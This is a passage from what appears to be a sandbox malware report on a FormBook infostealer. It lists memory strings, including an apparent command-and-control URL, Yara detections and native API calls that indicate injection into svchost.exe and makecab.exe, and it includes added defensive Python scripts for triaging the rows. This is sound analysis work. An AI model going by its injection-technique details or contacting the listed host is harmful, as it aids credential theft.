6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound">
            Source: eKxwLXHhqpgy.exe, 00000007.00000002.3563473884.0000000005680000.00000040.80000000.00040000.00000000.sdmp  String found in binary or memory: http://www.crowsecurity.cloud
            Source: eKxwLXHhqpgy.exe, 00000007.00000002.3563473884.0000000005680000.00000040.80000000.00040000.00000000.sdmp  String found in binary or memory: http://www.crowsecurity.cloud/oigd/
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: makecab.exe, 00000006.00000002.3562512745.0000000005438000.00000004.10000000.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561845912.00000000038D8000.00000004.00000001.00040000.00000000.sdmp  String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: makecab.exe, 00000006.00000002.3560929755.0000000002B06000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: makecab.exe, 00000006.00000002.3560929755.0000000002B06000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: makecab.exe, 00000006.00000002.3560929755.0000000002B06000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: makecab.exe, 00000006.00000002.3560929755.0000000002AE1000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: makecab.exe, 00000006.00000002.3560929755.0000000002AE1000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: makecab.exe, 00000006.00000003.2335386294.0000000007A1A000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://www.ecosia.org/newtab/
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            Source: Yara match  File source: 1.2.svchost.exe.2410000.0.unpack, type: UNPACKEDPE
            Source: Yara match  File source: 1.2.svchost.exe.2410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match  File source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.2410000.0.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.2410000.0.raw.unpack, type: UNPACKEDPE  Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
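The rows under the string heading and under both Yara headings carry the same kind of memory-dump descriptor (for example 00000007.00000002.3563473884.0000000005680000.00000040.80000000.00040000.00000000.sdmp), which encodes the process index, the analysis stage, the region's base address and its page protection. Reading those fields is what lets a responder tell that the only non-browser URL listed, http://www.crowsecurity.cloud/oigd/, was found in a PAGE_EXECUTE_READWRITE region of eKxwLXHhqpgy.exe adjacent to the region the FormBook rule fired on, while the ecosia, duckduckgo, yahoo and login.live.com strings sit in PAGE_READWRITE regions of makecab.exe, where browser configuration read by the stealer would land. The Python below is an added example, mine rather than code from the report or the sample: it parses the descriptors and performs that split over rows copied from this report. The meaning of the process-index and stage fields is my reading of the report's identifiers and is treated as an assumption; the last three descriptor fields are left undecoded.

```python
"""Added example, not part of the Joe Sandbox report: tie "String found in binary
or memory" and "Yara match" rows back to the process and page protection of the
memory region each hit came from.  Assumed descriptor layout (my reading of the
identifiers on this page; the last three fields are left undecoded):
    <proc>.<stage>.<dumpid>.<base>.<protect>.<f6>.<f7>.<f8>.sdmp
proc = process index used throughout the report (6 = makecab.exe, 7 = eKxwLXHhqpgy.exe),
stage = 2 for dumps taken at the end of the run and 3 for dumps taken while it ran,
base = region base address, protect = Win32 page protection of the region."""
import re
from collections import defaultdict
from dataclasses import dataclass

PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

DUMP_RE = re.compile(r"(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})"
                     r"(?:\.[0-9A-Fa-f]{8}){3}\.sdmp")
# Row shapes as they appear in the report's text; the \s* tolerates rows with or
# without a space between the descriptor and the "String"/"File" column.
STRING_ROW = re.compile(r"^Source: (?P<proc>[^,]+), (?P<dump>\S+?\.sdmp)\s*"
                        r"String found in binary or memory: (?P<url>\S+)$")
YARA_ROW = re.compile(r"^Source: Yara match\s*File source: (?P<dump>\S+?\.sdmp), type: MEMORY$")


@dataclass(frozen=True)
class Dump:
    proc: int
    stage: int
    base: int
    protect: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:02X}")

    @property
    def executable(self) -> bool:
        # Every PAGE_EXECUTE* constant (0x10, 0x20, 0x40, 0x80) sets a high-nibble bit.
        return bool(self.protect & 0xF0)


def parse_dump(desc: str) -> Dump:
    m = DUMP_RE.fullmatch(desc)
    if m is None:
        raise ValueError(f"not a memory dump descriptor: {desc}")
    return Dump(int(m[1]), int(m[2]), int(m[4], 16), int(m[5], 16))


def triage(rows):
    """Split URLs by the protection of the region they were read from and list,
    per process, the protections of the regions that matched Yara."""
    code_urls, data_urls = set(), set()
    yara = defaultdict(set)
    for row in rows:
        if (m := STRING_ROW.match(row)) is not None:
            d = parse_dump(m["dump"])
            (code_urls if d.executable else data_urls).add(m["url"])
        elif (m := YARA_ROW.match(row)) is not None:
            d = parse_dump(m["dump"])
            yara[d.proc].add(d.protect_name)
    return {"code_urls": sorted(code_urls), "data_urls": sorted(data_urls),
            "yara": {p: sorted(v) for p, v in yara.items()}}


# Rows copied from the report (a subset; rows listing two sources are skipped).
ROWS = [
    "Source: eKxwLXHhqpgy.exe, 00000007.00000002.3563473884.0000000005680000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.crowsecurity.cloud/oigd/",
    "Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=",
    "Source: makecab.exe, 00000006.00000002.3560929755.0000000002B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033",
    "Source: Yara matchFile source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY",
]

if __name__ == "__main__":
    for key, value in triage(ROWS).items():
        print(f"{key}: {value}")
```

A URL in an executable region is worth treating as a candidate C2 indicator regardless of reputation; a URL in a read/write region first needs the question of whether the process read it from a local file, which for the browser search-provider strings above is the more likely explanation.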
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0243C533 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E74340 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E74650 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72AD0 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72F30 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72C70 NtFreeVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E72D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E73090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E73010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E73D70 NtOpenThread
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E73D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04774650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04774340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047739B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04773010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04773090 NtSetValueKey
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04773D70 NtOpenThread
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04773D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04772B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_02829200 NtClose
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_02829360 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_02829070 NtReadFile
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_02829160 NtDeleteFile
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_02828F00 NtCreateFile
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_045DF9FC NtMapViewOfSection
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_045DFA51 NtClose
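The Nt* rows above describe the same code twice: every named function in svchost.exe at 0x02E7xxxx has a counterpart in makecab.exe at 0x0477xxxx at exactly the same low-order offset, and the functions are spaced 0x10 bytes apart in system-call-number order (NtWaitForSingleObject, NtReadFile, NtWriteFile and NtClose, system calls 4, 6, 8 and 0x0F, at ...2AB0, ...2AD0, ...2AF0 and ...2B60), which is the layout of ntdll's system-call stub table. The two processes therefore hold one image, consistent with a private copy of ntdll, mapped at bases 0x01900000 apart; the remaining addresses (0x0243xxxx in svchost.exe, 0x0282xxxx and 0x045Dxxxx in makecab.exe) are separate code that reaches the same calls. The Python below is an added example, mine rather than code from the report or the sample: it parses rows copied from this report, groups the native calls per process, reports which injection primitives each process combines, and tests for the shared image by computing the address delta that holds for every same-named function. The grouping of calls into technique names is my own heuristic, not something the report states.

```python
"""Added example (mine, not code from the report or from the sample): read the
report's "Code function" rows, group native calls per process, and check
(a) which injection primitives each process combines and (b) whether two
processes carry the same code at different base addresses."""
import re
from collections import defaultdict

# Row shape in the report: "Source: <image>Code function: <id> <api>,<api>,...,<id>"
# with <id> = "<process index>_<stage>_<hex address>", repeated at the end of the row.
# The repeat and the space before "Code function" are optional so re-spaced rows parse too.
ROW_RE = re.compile(
    r"^Source: (?P<image>.+?)\s*Code function: (?P<id>\d+_\d+_[0-9A-Fa-f]{8})(?P<mid>.*?)(?:(?P=id))?$")

# My heuristic: native calls that, seen together in one process, make up an injection technique.
INJECTION_PRIMITIVES = {
    "thread context hijacking": {"NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread"},
    "APC injection": {"NtWriteVirtualMemory", "NtQueueApcThread"},
    "section mapping": {"NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"},
}


def parse_rows(rows):
    """Return {process index: {"image": path, "funcs": {api: {addresses}}, "unnamed": n}}."""
    procs = {}
    for row in rows:
        m = ROW_RE.match(row)
        if m is None:
            continue
        proc_idx, _stage, addr = m["id"].split("_")
        entry = procs.setdefault(int(proc_idx),
                                 {"image": m["image"], "funcs": defaultdict(set), "unnamed": 0})
        apis = [a for a in m["mid"].strip().split(",") if a]
        if not apis:                      # rows like "1_2_02428623" name no API at all
            entry["unnamed"] += 1
        for api in apis:
            entry["funcs"][api].add(int(addr, 16))
    return procs


def techniques(funcs):
    """Technique names whose full primitive set is present in one process."""
    present = set(funcs)
    return sorted(name for name, need in INJECTION_PRIMITIVES.items() if need <= present)


def relocation_deltas(funcs_a, funcs_b):
    """Address deltas (b - a) that hold for every API named in both processes.
    A single surviving delta means the same image is mapped at two bases."""
    deltas = None
    for api in set(funcs_a) & set(funcs_b):
        pairs = {b - a for a in funcs_a[api] for b in funcs_b[api]}
        deltas = pairs if deltas is None else deltas & pairs
    return deltas or set()


def triage(rows):
    procs = parse_rows(rows)
    report = {idx: {"image": e["image"], "techniques": techniques(e["funcs"]), "unnamed": e["unnamed"]}
              for idx, e in procs.items()}
    shared = {(a, b): relocation_deltas(procs[a]["funcs"], procs[b]["funcs"])
              for a in sorted(procs) for b in sorted(procs) if a < b}
    return {"processes": report, "shared_image": shared}


# Rows copied from the report (a representative subset).
ROWS = [
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0243C533 NtClose,1_2_0243C533",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72B60 NtClose,LdrInitializeThunk,1_2_02E72B60",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E74340 NtSetContextThread,1_2_02E74340",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72EE0 NtQueueApcThread,1_2_02E72EE0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72E30 NtWriteVirtualMemory,1_2_02E72E30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72FB0 NtResumeThread,1_2_02E72FB0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72F30 NtCreateSection,1_2_02E72F30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72D30 NtUnmapViewOfSection,1_2_02E72D30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72D10 NtMapViewOfSection,1_2_02E72D10",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024286231_2_02428623",
    r"Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04774340 NtSetContextThread,LdrInitializeThunk,6_2_04774340",
    r"Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04772EE0",
    r"Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772B60 NtClose,LdrInitializeThunk,6_2_04772B60",
    r"Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04772D30",
    r"Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04772D10",
    r"Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772F30 NtCreateSection,LdrInitializeThunk,6_2_04772F30",
    r"Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772FB0 NtResumeThread,LdrInitializeThunk,6_2_04772FB0",
    r"Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772E30 NtWriteVirtualMemory,6_2_04772E30",
    r"Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045DF9FC NtMapViewOfSection,6_2_045DF9FC",
    r"Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047314606_2_04731460",
]

if __name__ == "__main__":
    result = triage(ROWS)
    print(result["processes"])
    print({pair: [hex(d) for d in deltas] for pair, deltas in result["shared_image"].items()})
```

On the full row set the delta check returns exactly {0x01900000} for the svchost.exe/makecab.exe pair, because the extra NtClose and NtMapViewOfSection addresses in the 0x0243xxxx, 0x0282xxxx and 0x045Dxxxx ranges produce deltas that no other function shares and are intersected away.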
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02428623
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0241228F
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02412290
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0243EB33
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02426813
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_024130C0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_024130B6
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02420113
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0241111B
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02411120
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0241E193
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0241FEEA
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0241FEF3
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02412790
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02412488
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02412490
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EC02C0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EE0274
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02F003E6
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EFA352
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02ED2000
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EF81CC
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02F001AA
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EC8158
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E30100
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EDA118
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E5C6E0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E40770
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E64750
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EEE4F6
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EF2446
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EE4420
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02F00591
